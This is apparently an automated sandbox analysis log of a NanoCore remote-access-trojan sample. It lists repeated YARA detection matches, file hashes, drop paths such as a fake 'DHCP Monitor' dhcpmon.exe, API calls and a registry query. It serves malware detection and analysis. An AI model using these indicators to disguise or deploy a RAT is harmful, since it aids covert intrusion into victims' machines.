          Source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 16.2.dhcpmon.exe.3443dc4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.3191770.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_02E0131A NtQuerySystemInformation,
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_02E012DF NtQuerySystemInformation,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131710E: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01326776
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01318631
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_013271EF
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0133D1CE
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_013310D8
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131E3C0
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01313206
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_013412D4
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01330456
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131276D
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131E9C0
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0133487A
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0133086E
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_013238F1
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01323B6C
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01326BAB
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01334AA9
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131FA88
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0133CD20
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01325DA7
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01330CA3
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131BF33
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132FF5A
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131DF8C
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01313FDE
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131EE34
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01315E9C
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_01323E9D
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_0000000140013021
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_0000000140013507
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_0000000140010210
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_0000000140015220
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_000000014000EA48
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_0000000140014E80
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_0000000140014E90
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_0000000140012E97
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_0000000140015F30
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_000000014000B758
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_0000000140013798
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_0090524A
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_00F12477
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_00F27AC1
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_00F27FA7
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_01453850
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_0145B058
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_01458788
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_014523A0
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_01452FA8
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_0145944F
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_0145306F
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_01459C30
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_01459388
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_0145969B
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 16_2_00C6524A
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 16_2_02F023A0
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 16_2_02F02FA8
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 16_2_02F03850
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 16_2_02F0306F
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: String function: 0132EE60 appears 31 times
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: String function: 0132E3CC appears 35 times
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: String function: 0132E4A0 appears 53 times
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.335209581.0000000007AA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 01d32b29_by_Libranalysis.exe
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.334483521.0000000007940000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 01d32b29_by_Libranalysis.exe
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.335147370.0000000007A60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWindows.Storage.dll.MUIj% vs 01d32b29_by_Libranalysis.exe
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.335076587.0000000007A40000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 01d32b29_by_Libranalysis.exe
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.335076587.0000000007A40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 01d32b29_by_Libranalysis.exe
          Source: 01d32b29_by_Libranalysis.exe, 00000000.00000002.333359295.0000000003AF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs 01d32b29_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeSection loaded: dxgidebug.dll
          Source: 01d32b29_by_Libranalysis.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe query 'HKU\S-1-5-19\Environment'
          Source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000002.00000002.604469931.0000000005310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000002.00000002.604469931.0000000005310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: Service.exe PID: 6520, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: Service.exe PID: 6520, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: C:\Users\user\Desktop\Service.exe, type: DROPPEDMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: C:\Users\user\Desktop\Service.exe, type: DROPPEDMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Users\user\Desktop\Service.exe, type: DROPPEDMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 2.2.Service.exe.5310000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.5310000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 16.2.dhcpmon.exe.3443dc4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 16.2.dhcpmon.exe.3443dc4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.Service.exe.3191770.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 2.2.Service.exe.3191770.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
